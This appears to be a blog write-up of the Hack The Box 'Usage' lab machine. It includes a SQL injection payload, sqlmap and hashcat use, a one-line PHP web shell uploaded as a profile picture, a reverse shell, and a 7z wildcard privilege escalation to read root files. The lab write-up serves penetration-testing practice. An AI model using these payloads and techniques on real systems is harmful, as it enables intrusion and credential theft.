Hello everyone, in today’s blog post we will be doing Usage, Linux machine from Hack The Box, thank you for reading and enjoy!

1)Kicking it off with the Nmap scan as usual to see what we are dealing with:

Nothing too fancy here, only 2 ports, one being SSH and the other one port 80, I added it to the /etc/hosts right away and let’s get started with the enumeration!

2)Port 80 offers us a simple website that allows us to register and login, but there is nothing of interest after we log in as it’s a static web page. However, there is an Administrator log in as well which I don’t have credentials at the moment (I tried some default creds but they didn’t work out). The administrator endpoint is on a different subdomain (admin.usage.htb)

ffuf -w /usr/share/seclists/SecLists-master/Discovery/DNS/subdomains-toplmillion-5000.txt -H
"Host: FUZZ.usage.htb" -u http://10.10.11.18

3) The website allows us to reset our password, and that endpoint is vulnerable to SQL Injection! We can try to supply single quote instead of an email address and we are getting 500 server error, which is very good indicator of the SQL Injection, as our input goes directly into the SQL Query via concatenation, instead of usage of SQL Prepared statements, so we can think of the query in the back-end to be similar to this:

SELECT * FROM users WHERE email="<OUR_INPUT>"

That is why our input is being treaded as the another SQL command rather than a simple string that can be achieved via prepared statements. However, let’s proceed further with exploration:

Okay, now let’s see what type of SQL injection we have… I confirmed it’s a boolean-based SQL injection, here is the payload I used:

' OR '1'='1-- - (we need space after our comment because I identified that this is MySQL DB.

Cool, since this can be a tedious process to do it manually I used sqlmap to dump the database, and I found a couple creds, and of course the administrator’s one was the most interesting as we want to get access to that Admin Portal:

I used hashcat to crack the Administrator’s hash (Sorry I lost my Screenshots of the Sqlmap output and hashes, if someone is confused how I used sqlmap in this instance please feel free to leave a comment below or reach out to me on Discord)

hashcat -m 3200 hash.txt rockyou.txt

4)Great now we have access to the admin console, here I observed several different interesting things:

4.1) First thing that I wanted to check are the operational logs, and there I found the hash for the administrator password which I wasn’t able to crack:

4.2)Next thing that caught my attention is the file upload feature when you want to create new user, but however whenever I wanted to create a new user I got 500 error, so we can’t test file upload vulnerabilities that way.

4.3)Now I did some more enumeration and I decided to go back to the operational logs because I there wasn’t much else to do. In the logs I realized many GET Requests being made to the one endpoint that I didn’t see before during my initial enumeration: admin/auth/settings

4.4) I sent the request right away and via this endpoint I can edit the administrator’s profile, including the profile picture (always interesting file upload feature)!

4.5) I decided to give it a shot and try to upload simple PHP web shell right away:

<?php system($_GET['cmd']); ?>

And that worked out, awesome!

4.6) Now to get a reverse shell I use PentestMonkey PHP Reverse shell payload, as soon as I uploaded it and submitted changes via /settings endpoint I got shell on my netcat listener:

5) This way we got user.txt and initial foothold, cool!

6)Okay, the important lesson here is to always check the current user home directory for juicy information! Becuase in .monitrc hidden file we got password for another user -> xanter:

7)This way we can get a shell as Xander via SSH, cool! The first check that I like to make every time when I get the shell is sudo -l to see if I can run any commands as a sudo user, and as Xander I can do!

8)By running usage_management script as sudo user only first option works and that is for the backup, something that caught my eye is a usage of 7z which can be used for privilege escalation:

According to GTFOBINS, this is the command we have to initiate, but we don’t have that luxury at the moment because we can see that the script is backing up /var/www/html in the next screenshot:

I like to always use strings command to see more closely what is happening within the script:

Here we can see that indeed 7z is used to back /var/www/html into the /var/backups/project.zip, I also see a full 7z command that is being used ending in — *. Let’s do some google search for it!

And I found just what I was looking for on Hackticks (https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks) and how to read sensitive files this way:

8.1) Okay the path now is clear,I reproduced the same steps on the target machine:

8.2) Then when we ran that script as root user again we got the output of root.txt!:

8.3) We can use the same approach to get a private SSH key from root user and to get a shell as root. GG!

Lessons Learned

1) The first lesson that I learned here is to always check for every input field present in the web app as it can be vulnerable to some vulnerability, in this case, SQLI!

2) The next lesson that I learned is always enumerate more and more, as a lot of enumeration of the admin portal led me to discover that settings endpoint which allowed me to upload a reverse shell!

3) The third lesson is definitely paying attention to small details, especially in the current user’s home directory as passwords can be hidden in every file our there!

4)Finally, the last one is the importance of deep enumeration of scripts that we can run and what they are exactly doing when we run them, especially if we can do so as root user! Here I discovered the directory that is being backed up as well as the exact 7z command being used which led to the privilege escalation.

Leave a Reply

Your email address will not be published. Required fields are marked *

Trending